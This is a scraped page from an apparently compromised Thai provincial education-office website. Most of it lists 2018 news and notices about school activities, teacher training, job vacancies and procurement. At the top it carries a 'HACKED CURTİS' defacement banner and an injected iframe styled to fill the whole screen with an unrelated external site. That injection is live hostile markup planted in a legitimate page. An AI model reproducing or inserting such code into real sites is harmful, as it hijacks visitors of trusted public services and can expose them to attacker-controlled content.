HACKED CURTİS

ทันข่าว ทันเหตุการณ์ กับสถานการณ์ปัจจุบัน

<iframe src="http://www.estacaomix.dx.am/" style="border: 0; position: fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">

สร้างความปลอดภัยทางน้ำแก่นักเรียน

ดร.วิเชียร ทรงศรี ผอ.สพป.พล.3 ประธานพิธีเปิดโครงการสร้างความปลอดภัยทางน้ำแก่นักเรียนและเยาวชน กิจกรรมภาคฤดูร้อน ปีการศึกษา 2561 “ว่ายน้ำ เพื่อชีวิต” (LIVE SAVING) เพื่อเป็นการฝึกหัดให้เด็กนักเรียนและเยาวชนที่ว่ายน้ำไม่เป็น สามารถว่ายน้ำเป็น และเอาตัวรอดจากการจมน้ำ เมื่อประสบเหตุทางน้ำได้อย่างถูกต้อง ตามหลักสากล ซึ่งจะเกิดความปลอดภัยทั้งผู้ประสบเหตุและผู้ให้การช่วยเหลือลดอันตรายจากการจมน้ำของเด็ก และในการฝึกหัดในครั้งนี้จะได้รับความรู้เกี่ยวกับวิธีการช่วยชีวิตคนจากการจมน้ำแบบวิธีช่วยเหลือมาตรฐานสากล โดยใช้อุปกรณ์ใกล้ในวันที่ 19 พฤษภาคม 2561 ณ แหล่งน้ำธรรมชาติบ้านแก่งไฮ อ.นครไทย จ.พิษณุโลก

29 พ.ค. 61 phit_admin  113

อบรมครูตามแนวทางสะเต็มด้วยระบบทางไกล

ดร.ผกาภรณ์ พลายสังข์ รอง ผอ.สพป.พล.3 ประธานในพิธีเปิดการอบรมครูตามแนวทางสะเต็มด้วยระบบทางไกล (ระดับชั้นประถมศึกษาตอนปลาย) มีผู้เข้ารับการอบรม จำนวน 60 คน ณ โรงเรียนวัดโบสถ์ ศูนย์สะเต็ม สพป.พล.3 อ.วัดโบสถ์ จ.พิษณุโลก

2018-05-29  phit_admin   67

ขับเคลื่อนหลักสูตรการศึกษาปฐมวัย พุทธศักราช 2560

ดร.ผกาภรณ์ พลายสังข์ รองผอ.สพป.พล. 3 ประธานในพิธีเปิดการอบรมเชิงปฏิบัติการ การขับเคลื่อนหลักสูตรการศึกษาปฐมวัย พุทธศักราช 2560 สู่การปฏิบัติ ให้กับโรงเรียนในสังกัด วันที่ 19 - 20 พฤษภาคม 2561 ณ ห้องประชุมแควใหญ่ สพป.พล. 3 อ.วัดโบสถ์ จ.พิษณุโลก

2018-05-29  phit_admin   50

ตรวจเยี่ยมการเตรียมความพร้อมในการเปิดภาคเรียนที่ 1 ปีการศึกษา 2561

ดร.วิเชียร ทรงศรี ผอ.สพป.พล.3 ตรวจเยี่ยมโรงเรียนบ้านนาล้อม โรงเรียนน้ำภาคน้อย และ โรงเรียนบ้านห้วยท้องฟาน อ.ชาติตระการ จ.พิษณุโลก ตรวจเยี่ยมการเตรียมความพร้อมในการเปิดภาคเรียนที่ 1 ปีการศึกษา 2561 เพื่อให้โรงเรียนมีความพร้อมในการจัดกิจกรรมการจัดการเรียนการสอน ในวันที่ 18 พฤษภาคม 2561

2018-05-29  phit_admin   47

สร้างขวัญกำลังใจ

ดร.วิเชียร ทรงศรี ผอ.สพป.พล.3 ร่วมเป็นเจ้าภาพพระสวดอภิธรรม นางบุญธรรม อินต๊ะแสน มารดา นางรัชนีกร อินต๊ะแสน นักวิชาการศึกษา สพป.พล.3 เพื่อสร้างขวัญ กำลังใจ ให้กับ ในวันที่ 17 พฤษภาคม 2561 ณ วัดธรรมจักร อ.เมือง จ.พิษณุโลก

2018-05-29  phit_admin   49

[2018-05-24] ประกาศตำแหน่งว่า ผู้บริหารสถานศึกษา (เพิ่มเติม) phit_admin View : 441

[2018-05-08] แนวทางการดำเนินงานเพื่อช่วยเหลือนัเรียนที่มีภาวะเสี่ยงต่อความล้มเหลวทางการเรียน phit_admin View : 319

[2018-05-08] รายงานผลการนิเทศ ติดตามและประเมินผลคุณภาพการจัดการศึกษาของสถานศึกษา สานักงานเขตพื้นที่การศึกษาประถมศึกษาพิษณุโลก เขต 3 phit_admin View : 269

[2018-05-06] กำหนดการ การอบรมการจัดการศึกษาทางไกลผ่่านดาวเทียมรูปแบบใหม่ NEW DLTV phit_admin View : 173

[2018-04-26] คำสั่ง สพป.พิษณุโลก เขต 3 เรื่อง แต่งตั้งคณะกรรมการ ฉก.คศ. ระดับสถานศึกษา phit_admin View : 214

[2018-03-26] ประกาศตำแหน่งว่างเพื่อเปลี่ยนตำแหน่ง การย้าย การโอนข้าราชการครูและบุคลากรทางการศึกษา และการย้ายข้าราชการพลเรือนสามัญไปบรรจุและแต่งตั้งให้ดำรงตำแหน่งบุคลากรทางการศึกษาอื่น ตามมาตรา 38 ค.(2) และการโอนพนักงานส่วนท้องถิ่นและข้าราชการอ่ืน phit_admin View : 638

[2018-03-19] ผลการพิจารณาย้ายข้าราชการครูและบุคลากรทางการศึกษา ตำแหน่งครู ประจำปี 2561 phit_admin View : 925

[2018-03-18] ระเบียบวาระการประชุมผู้บริหารสถานศึกษาฯ ครั้งที่ 1/2561 phit_admin View : 408

[2018-05-07] โรงเรียนบ้านหลังเขาประกาศรับสมัครคัดเลือกบุคคลเพื่อข้างเป็นลูกจ้างชั่วคราวปฏิบัติหน้าที่นักการภารโรง phit_admin View : 139

[2018-04-27] โรงเรียนบ้านหนองกระบาก ประกาศรับสมัครสอบคัดเลือกครูอัตราจ้าง ทำหน้าที่ครูผู้สอนระดับปฐมวัยและประถมศึกษา 2 ตำแหน่ง phit_admin View : 182

[2018-04-27] โรงเรียนบ้านบุ่งวิทยา ประกาศรายชื่อผู้มีสิทธิ์สอบเป็นลูกจ้างชั่วคราวตำแหน่งครูผู้สอน phit_admin View : 117

[2018-04-25] โรงเรียนบ้านน้ำตาก ประกาศรับสมัครสอบคัดเลือกบุคคล เพื่อจ้างเป็นครูอัตราจ้างทำหน้าที่ครูผู้สอน หากสนใจติดต่อ ผอ.ดำเนิน ทาบาง ผู้อำนวยการโรงเรียน โทร 085-7264281 phit_admin View : 156

[2018-04-25] โรงเรียนบ้านบุ่งวิทยาประกาศรับสมัครสอบคัดเลือกบุคคลเพื่อจ้างเป็นครูอัตราจ้างทำหน้าที่ครูผู้สอน phit_admin View : 150

[2018-03-19] ขอให้โรงเรียนทุกแห่ง ตรวจสอบ การกรอกข้อมูลระบบเครือข่ายอินเทอร์เน็ตและการใช้ งานอุปกรณ์กําหนดเส้นทาง (Router)ที่อัปโหลดไฟล์ ใบเสนอราคา/ค่าเช่า phit_admin View : 152

[2018-03-18] การตรวจสอบการอับโหลด ไฟภาพสัญญาเช่าและค่าบริการรายเดือน ข้อมูลระบบเครือข่ายอินเทอร์เน็ตและการใช้ งานอุปกรณ์กําหนดเส้นทาง (Router) เพื่อการจัดสรรค์ phit_admin View : 217

[2018-03-18] ขั้นตอนการบันทึกข้อมูลระบบเครือข่ายอินเทอร์เน็ตและการใช้ งานอุปกรณ์กําหนดเส้นทาง (Router) เพื่อการจัดสรรค์ ค่าเช่าอินเทอร์เน็ตรายเดือน ของโรงเรียน phit_admin View : 103

[2018-03-13] ประกวดราคาซื้อระบบคอมพิวเตอร์และอุปกรณ์ต่อพ่วงให้กับโรงเรียนที่อยู่ในโครงการพัฒนาคุณภาพการศึกษาด้วยเทคโนโลยีทางไกลผ่านเทคโนโลยีสารสนเทศ (DLIT) phit_admin View : 88

[2017-12-06] แบบรายงานขอซื้อ(เฉพาะเจาะจง) ฉบับสมบูรณ์ phit_admin View : 206

[2017-11-28] ขอบเขตของงาน (Terms of Reference : TOR) การจัดซื้อครุภัณฑ์ยานพาหนะและขนส่ง phit_admin View : 206

[2017-11-28] ขอบเขตของงาน (Terms of Reference : TOR) การจัดซื้อครุภัณฑ์ phit_admin View : 168

[2017-11-27] แบบรายงานขอซื้อ(เฉพาะเจาะจง) phit_admin View : 187

[2017-11-27] แบบจัดซื้อจัดจ้างประกวดราคาอิเล็กทรอนิกส์ phit_admin View : 151

[2017-11-23] ตารางแสดงวงเงินงบประมาณที่ได้รับจัดสรรและราคากลางในการจัดซื้อจัดจ้างที่มิใช่งานก่อสร้าง phit_admin View : 164

[2017-11-01] ส่งแบบรายงานผลการดำเนินงานตามแผนปฏิบัติการจัดซื้อจัดจ้าง ครั้งที่ 2 phit_admin View : 185